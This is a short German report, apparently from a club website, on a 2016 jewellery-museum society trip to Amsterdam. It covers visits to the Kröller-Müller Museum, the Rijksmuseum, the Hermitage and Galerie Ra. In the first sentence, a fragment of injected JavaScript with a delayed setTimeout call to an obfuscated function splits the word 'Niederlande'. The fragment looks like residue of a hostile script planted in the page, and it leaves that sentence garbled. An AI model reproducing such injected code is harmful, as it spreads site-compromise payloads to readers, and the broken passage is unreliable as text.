///

Kunstreise nach Amsterdam (2016)

Amsterdam, die lebendige Hauptstadt der Niederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande mit ihrem breiten Spektrum an historischen und kulturellen Sehenswürdigkeiten, war vom 28. – 30. Oktober das Ziel der diesjährigen Kunstfahrt der Gesellschaft der Freunde des Schmuckmuseums.

Dreiundzwanzig kunstinteressierte Mitglieder der Gesellschaft nutzten die Gelegenheit um ausgewählte Highlights der Kunst und Kultur Amsterdams kennen zu lernen.

Die Hinfahrt am Freitag wurde durch einen Besuch des durch seine einzigartige Lage in einem wunderschönen Skulpturenpark und durch eine der größten Van Gogh Sammlung berühmten Kröller-Müller-Museums unterbrochen.

Unterschiedliche interessante Besuche und Führungen bestimmten den Tagesablauf am Samstag. Höhepunkt war der Besuch des Rijksmuseums mit Führungen in der Schmuckabteilung durch deren Kuratorin und durch Dr. Marjan Unger, Buchautorin und exzellente Kennerin der internationalen Schmuckszene.

Ein weiterer Programmpunkt war der Besuch der Ausstellung Katharina die Große in der Amsterdamer Hermitage. Ein Kontrastprogramm war dann am Nachmittag der Besuch der Galerie Ra, die sich ihrem nunmehr 40jährigen Bestehen mit dem Schmuckkünstler und Galeristen Paul Derrez zu einer der weltweit bekanntesten Galerien für zeitgenössischen Schmuck entwickelt hat.

Begleitet und geführt wurden wir sprach- und ortskundig von Ursula Wörner, einer ehemaligen Schülerin der Goldschmiedeschule, die schon viele Jahre in Amsterdam lebt.

Schlusspunkt der Reise war dann am Sonntagvormittag die für Amsterdam obligatorische Grachtenfahrt.